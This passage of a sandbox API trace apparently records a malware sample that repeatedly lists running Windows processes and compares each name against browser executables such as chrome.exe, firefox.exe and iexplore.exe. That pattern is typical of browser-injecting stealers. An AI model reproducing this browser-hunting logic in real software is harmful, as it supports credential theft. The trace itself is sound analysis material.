lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.331] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0223.331] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0223.331] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0223.331] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0223.331] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.332] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.332] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.332] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.332] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.332] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0223.332] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0223.332] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0223.332] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0223.332] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0223.332] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.333] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.333] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.333] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.333] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.333] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.333] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0223.333] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0223.333] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0223.333] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0223.333] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.334] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0223.334] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0223.334] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0223.334] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0223.334] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.334] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0223.335] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0223.335] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0223.335] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0223.335] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0223.335] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.335] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0223.335] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0223.335] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0223.335] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0223.335] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.336] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0223.336] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0223.336] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0223.336] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0223.336] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.336] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.369] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0223.369] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0223.369] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0223.369] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0223.369] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.369] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.370] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0223.370] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0223.370] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0223.370] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0223.370] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.370] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.370] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0223.370] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0223.371] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0223.371] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0223.371] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.371] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0223.371] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0223.371] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0223.371] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0223.371] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0223.371] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0223.371] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0223.372] CloseHandle (hObject=0xe8) returned 1 [0223.372] Sleep (dwMilliseconds=0x3e8) [0224.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0224.410] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.410] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0224.410] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0224.410] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0224.410] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0224.410] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0224.410] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.411] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0224.411] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0224.411] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0224.411] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0224.411] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0224.411] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.411] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0224.411] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0224.411] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0224.412] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0224.412] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.412] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0224.412] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0224.412] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0224.412] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0224.412] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.413] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0224.413] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0224.413] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0224.413] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0224.413] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.413] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0224.413] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0224.413] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0224.413] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0224.413] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.414] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0224.414] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0224.414] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0224.414] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0224.414] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.415] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0224.415] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0224.415] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0224.415] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0224.415] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.415] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0224.415] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0224.415] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0224.415] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0224.415] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.416] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0224.416] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0224.416] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0224.416] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0224.416] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.416] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.416] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.416] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.416] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.417] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.417] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.417] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.417] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.417] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.417] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.418] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.419] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.419] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.419] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.419] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.419] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.419] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0224.419] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0224.419] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0224.419] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0224.420] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.420] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.420] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.420] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.420] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.420] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.421] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.421] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.421] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.421] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.421] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.421] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0224.421] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0224.421] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0224.421] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0224.421] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.422] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0224.422] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0224.422] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0224.422] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0224.422] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.422] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.422] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0224.422] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0224.422] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0224.422] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0224.422] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.423] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.423] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.423] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.423] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.423] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0224.424] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0224.424] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0224.424] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0224.424] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0224.424] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0224.424] lstrcmpiA (lpString1="abortion-serbia-effect.exe", 